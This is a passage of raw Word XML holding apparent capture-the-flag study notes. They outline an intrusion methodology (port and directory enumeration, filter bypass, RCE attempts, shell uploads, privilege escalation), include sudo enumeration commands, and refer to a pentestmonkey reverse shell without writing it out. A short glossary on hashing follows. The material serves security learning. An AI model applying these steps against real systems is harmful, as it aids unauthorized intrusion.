      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>”t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C21B5C7" w14:textId="5EBBFCB3" w:rsidR="004D43EE" w:rsidRPr="0084205E" w:rsidRDefault="004D43EE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check sudo privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDA4168" w14:textId="10CCFA98" w:rsidR="004D43EE" w:rsidRPr="0084205E" w:rsidRDefault="004D43EE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B65B9B" w14:textId="601CEAF3" w:rsidR="004D43EE" w:rsidRPr="0084205E" w:rsidRDefault="004D43EE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sudo ls</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/../../*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E4F7B" w14:textId="48E66DC0" w:rsidR="00933917" w:rsidRPr="0084205E" w:rsidRDefault="00933917" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Repetitious decoding of base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0D3C2F" w14:textId="460B5361" w:rsidR="00435385" w:rsidRPr="0084205E" w:rsidRDefault="00435385" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Rabbit hole – no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bueno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3093BD20" w14:textId="6F4CF852" w:rsidR="00902EBB" w:rsidRPr="0084205E" w:rsidRDefault="00902EBB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Test if python3 can be used by inputting hello world into command line with proper syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DF4777" w14:textId="3B8A964B" w:rsidR="00435385" w:rsidRPr="0084205E" w:rsidRDefault="00435385" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Python3 remote shell into command line from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pentestmonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EB47DDB" w14:textId="6206F68E" w:rsidR="00435385" w:rsidRPr="0084205E" w:rsidRDefault="00435385" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cat “&lt;file&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FDE3A4" w14:textId="7A7B58DE" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Nmap scan + Source Code Review + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="690D2EFD" w14:textId="588287B0" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ports dictate size of attack surfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229C545D" w14:textId="35916BCD" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Source Code Reviews assist in determining directories, developer notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E163FA" w14:textId="7ED429EA" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> assists with directory enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C58E1F6" w14:textId="5DEEB05D" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Explore ports and directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F0D02E" w14:textId="0146ACFC" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Priority order set by intelligence found during preliminary enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F66E5B0" w14:textId="1F164A31" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Continue to explore and develop sitemap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528FC90" w14:textId="7A027B8A" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find potential attack vectors such as logins or file uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A4CB3" w14:textId="120819B5" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Explore potential attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCEE7A1" w14:textId="05F932DF" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Determine protective measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3723583D" w14:textId="5B96A92F" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE54531" w14:textId="3EAC09EB" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intercepts in Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6905443A" w14:textId="037E4258" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> possibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3CC37" w14:textId="1DABE090" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Determine blacklists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D2AF94" w14:textId="0636B68E" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bypass protective measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C062B0B" w14:textId="18168235" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDEDD3F" w14:textId="7B266134" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Input workarounds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C039A" w14:textId="4FDAD899" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Blacklist tricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B44D23" w14:textId="162B70E8" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Attempt RCE exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B973911" w14:textId="28940BEE" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shell uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529A7A28" w14:textId="68269A1D" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00377CF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Stabilize shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF34678" w14:textId="72CBBBD5" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00195955" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Escalate privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F6248" w14:textId="179E5B89" w:rsidR="00195955" w:rsidRPr="0084205E" w:rsidRDefault="00195955" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Navigate and find flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A5B08" w14:textId="4E2A9AFF" w:rsidR="00195955" w:rsidRPr="0084205E" w:rsidRDefault="00195955" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A6A419" w14:textId="69BF743B" w:rsidR="00195955" w:rsidRPr="0084205E" w:rsidRDefault="00F63D9C" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6E71B4" w14:textId="1B3BAAE9" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Terms </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DAF530" w14:textId="61BF8C18" w:rsidR="00F63D9C" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35051F8A" w14:textId="35FE5EDE" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Encoding – not encryption, form of data representation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A37D2" w14:textId="77EA1975" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hash – output of hash function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF856D" w14:textId="17177C01" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Brute force – form of attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFCF160" w14:textId="2BB311AC" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cryptanalysis – form of attack by targeting the underlying math</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB9B0C7" w14:textId="4AF3D882" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hash Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5CEA5" w14:textId="4C54E562" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>No key and meant to be impossible to reverse output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF0AFF3" w14:textId="68BD7BAD" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Input data of any size and creates a digest of that data, a summary of fixed size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E7B15" w14:textId="5FB2132B" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Hard to predict output and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>visa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> versa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D963A07" w14:textId="0EACA1DC" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Small changes can lead to huge differences in output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCA3A89" w14:textId="3296ABCE" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Commonly encoded afterward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949C6E4" w14:textId="3DCA526B" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Importance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B66E0" w14:textId="0A0A4CEC" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
